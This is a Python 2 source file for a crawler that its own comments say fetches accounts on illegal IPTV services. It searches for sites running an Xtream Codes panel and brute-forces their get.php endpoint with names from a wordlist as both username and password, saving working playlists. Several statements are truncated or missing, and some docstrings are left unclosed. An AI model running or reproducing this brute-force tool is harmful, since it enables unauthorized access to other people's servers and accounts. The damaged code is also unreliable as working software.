import urllib2
import google
import time
import pyprind
import os
import random
from urlparse import urlparse

# Class that handles the crawling process that fetches accounts on illegal IPTVs.
#
# Claudio Ludovico (@Ludo237)
# Pinperepette (@Pinperepette)
# Arm4x (@Arm4x)
class Crawler(object):
    """Hold the crawler's configuration constants and per-instance search state."""
    # version of this crawler
    version = "1.2.3"
    # default directory under which per-site output folders are created
    outputDir = "output"
    # default directory holding the per-language names files (<language>.txt)
    languageDir = "languages"
    # path-and-query template appended to a site's base URL; search_accounts
    # fills both %s placeholders with the same row of the names file
    basicString = "/get.php?username=%s&password=%s&type=m3u&output=mpegts"
    # string used to search for the CMS
    # NOTE(review): not referenced by any statement visible in this file.
    searchString = "Xtream Codes v1.0.59.5"

    def __init__(self, language = "it"):
        """Default constructor

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
                    names file we need to use. (default it)
        self.language = language.lower()
        self.parsedUrls = []
        self.foundedAccounts = 0

    def change_language(self, language = "it"):
        """Set the language you want to use to brute force names

        Keyword arguments:
        language -- Language parameter allows us to understand what kind of
                    names file we need to use. (default it)

        boolean -- true if the language file exists, otherwise false
        if os.path.isfile(self.languageDir + "/" + language + ".txt"):
            self.language = language
            return True
            return False

    def search_links(self):
        """Collect the base URLs of the results of a Web search.

        Each result is reduced to "scheme://host" and appended to
        self.parsedUrls; nothing is printed or returned.

        The limit of 30 links is set because this script serves as a
        demonstration and is not intended to be used for personal purposes.
        """
        # NOTE(review): the iterable expression of this loop is truncated in
        # this copy of the file (only the trailing `num=30, stop=1)` arguments
        # survive), so the statement is not valid Python as written. Restore
        # it from the project's history rather than guessing.
        for url in, num=30, stop=1):
            parsed = urlparse(url)
            # Keep only scheme and host; path, query and fragment are dropped.
            self.parsedUrls.append(parsed.scheme + "://" + parsed.netloc)

    def search_accounts(self, url = None):
        """Search Accounts

        This is the core method. It iterates over the rows of the names file
        of the current language and, for every row that yields non-empty
        content, calls create_file() to store that content as an .m3u file
        in a directory named after the site under the output directory.
        Please use VLC to open that kind of file.

        Keyword arguments:
        url -- a url from the fetched list; when omitted, one is picked at
               random from self.parsedUrls. (default None)

        Returns:
        string -- the status of the crawling session
        """
        # NOTE(review): this copy of the method is damaged and is not valid
        # Python as written. The individual problems are flagged inline.
        if not self.parsedUrls:
            return "You must fetch some URLs first"
            # NOTE(review): from here on the code is indented one level deeper
            # than the guard above, and the except clauses at the end have no
            # visible `try:` -- a `try:` line appears to be missing here.
            if not url:
                url = random.choice(self.parsedUrls)
            fileName = self.languageDir + "/" + self.language + ".txt"
            fileLength = self.file_length(fileName)
            # Progress bar sized by the number of rows in the names file.
            progressBar = pyprind.ProgBar(fileLength, title = "Fetching account from " + url + " this might take a while.", stream = 1, monitor = True)
            # NOTE(review): this local is never read in the visible code; the
            # counter reported below is self.foundedAccounts.
            foundedAccounts = 0
            with open(fileName) as f:
                rows = f.readlines()
            for row in rows:
                # A new opener with a browser-like User-agent header is built
                # for every row.
                opener = urllib2.build_opener()
                opener.addheaders = [('User-agent', 'Mozilla/5.0')]
                # NOTE(review): the next two statements are truncated in this
                # copy (the left operand of `+` and the whole right-hand side
                # of `fetched =` are missing). What survives shows basicString
                # being formatted with the stripped row in both placeholders.
                response = + self.basicString % (row.rstrip().lstrip(), row.rstrip().lstrip()))
                fetched =
                # NOTE(review): only the local row counter is decremented
                # here; no call on progressBar is visible in this copy.
                fileLength = fileLength - 1
                # If the fetched content is not empty
                # we build the dedicated .m3u file
                if len(fetched) > 0:
                    # Only an "http://" prefix is stripped from the url.
                    newPath = self.outputDir + "/" + url.replace("http://", "")
                    self.create_file(row, newPath, fetched)
            # NOTE(review): the original comment here spoke of removing the
            # used url to avoid parsing it again, but no such statement is
            # visible in this copy.
            if self.foundedAccounts != 0:
                return "Search done, account founded on " + url + ": " + str(self.foundedAccounts)
                # NOTE(review): unreachable as written (same indentation as
                # the return above); presumably an `else:` line is missing.
                return "No results for " + url
        except IOError:
            return "Cannot open the current Language file. Try another one"
        except urllib2.HTTPError, e:
            return "Ops, HTTPError exception here. Cannot fetch the current URL " + str(e.code)
        except urllib2.URLError, e:
            return "Ops, the URL seems broken." + str(e.reason)
        except Exception:
            return "Ops something went wrong!"

    def create_file(self, row, newPath, fetched):
        """Create File
        Once the parse founds something worth it, we need to create the .m3u file
        to do so we except a newPath and the current row used from names file and also
        the content from the fetched response

        Keyword arguments:
        row -- row of the language file, this allow us to understand which names
        were useful for the brute force.

        newPath -- The path that we use to store the current fetched accounts.

        fetched -- the current response file from the attack.
        if os.path.exists(newPath) is False:
        outputFile = open(str(newPath) + "/tv_channels_%s.m3u" % row.rstrip().lstrip(), "w")
        self.foundedAccounts = self.foundedAccounts + 1

    def file_length(self, fileName):
        """File Length
        Cheapest way to calculate the rows of a file

        Keyword arguments:
        fileName -- string the filename into which we will check its Length
        with open(fileName) as f:
            for i, l in enumerate(f):
        return i + 1